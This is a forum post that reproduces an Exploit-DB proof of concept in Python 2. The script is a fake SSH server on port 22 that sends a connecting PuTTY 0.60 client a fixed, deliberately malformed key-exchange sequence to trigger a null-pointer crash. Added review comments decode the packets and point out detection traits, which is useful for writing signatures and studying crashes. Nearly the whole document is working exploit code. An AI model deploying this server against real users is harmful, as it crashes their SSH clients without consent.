# Forum post by Serar, December 24, 2011 (edited the same day).
# Source : http://www.exploit-db.com/exploits/18270/
#
# Proof-of-concept for the crash that the banner below calls
# "putty 0.60 Null Ptr". Python 2 syntax (print statements).
#
# Behaviour: listens on HOST:22, accepts a single TCP connection, writes four
# canned byte strings to it and closes. It never reads from the peer, so the
# exchange is a fixed replay rather than an SSH server implementation.
#
# Framing of the four blobs, decoded from the hex (useful when writing a
# network signature or triaging a client crash dump):
#   1. identification line "SSH-2.0-WeOnlyDo 2.1.3\r\n"
#   2. packet with message number 0x14 (SSH_MSG_KEXINIT in RFC 4253); some
#      bytes inside its algorithm name-lists are not printable ASCII, so the
#      packet looks deliberately malformed (presumably fuzzer output; the
#      page does not say)
#   3. packet with message number 0x1f (SSH_MSG_KEXDH_REPLY) carrying
#      "ssh-rsa" key and signature fields
#   4. packet with message number 0x15 (SSH_MSG_NEWKEYS)
#
# NOTE(review): all three binary packets are key-exchange messages, so a
# client would parse them before user authentication and presumably before
# it has accepted the host key; confirm against the client under test.
# NOTE(review): a peer that emits KEXINIT, KEXDH_REPLY and NEWKEYS
# back-to-back without waiting for the client's own key-exchange messages is
# not behaving like a conforming server, which is a usable detection trait.
# NOTE(review): the page names only version 0.60 as affected; check the
# vendor's release notes for the fixed release before judging exposure.
import sys
import socket
import binascii

# Banner, printed exactly as in the post (each print adds its own newline).
for banner_line in (
    "\n",
    "----------------------------------------------------------------",
    "| putty 0.60 Null Ptr |",
    "| Level Smash the Stack |",
    "----------------------------------------------------------------",
    "\n",
):
    print banner_line

# Listening address comes from the first command-line argument; the port is
# fixed at the SSH default, which needs elevated privileges on most systems.
HOST = sys.argv[1]
PORT = 22

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind((HOST, PORT))
listener.listen(1)
# Blocks until one client connects; no further connections are served.
client, peer_addr = listener.accept()

# Hex-encoded wire data, reproduced verbatim from the post. Adjacent string
# literals inside each pair of parentheses concatenate into one blob.
handshake_hex = [
    # 1. SSH identification string.
    ("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
    # 2. KEXINIT-type packet (message number 0x14).
    ("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
     "e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
     "10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
     "362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
     "96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
     "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
     "33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
     "32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
     "d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
     "22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
     "d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
     "d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
     "111001111111111111111111111111111"),  ## The 00 controls the crash
    # 3. KEXDH_REPLY-type packet (message number 0x1f).
    ("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
     "64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
     "76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
     "85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
     "000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
     "3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
     "a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
     "f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
     "3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
     "b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
     "75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
     "20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
     "6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
     "ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
     "cac4453d629a47d000000000000000000"),
    # 4. NEWKEYS-type packet (message number 0x15).
    ("0000000c0a15a1640000c32700008e14"),
]

# Write every blob in order. send() is used as in the post, so a short write
# would go unnoticed.
for hex_blob in handshake_hex:
    client.send(binascii.unhexlify(hex_blob))

client.close()
listener.close()
pyth0n3 Posted December 24, 2011
Source
Serar Posted December 24, 2011
scuze crezusem ca am pus sursa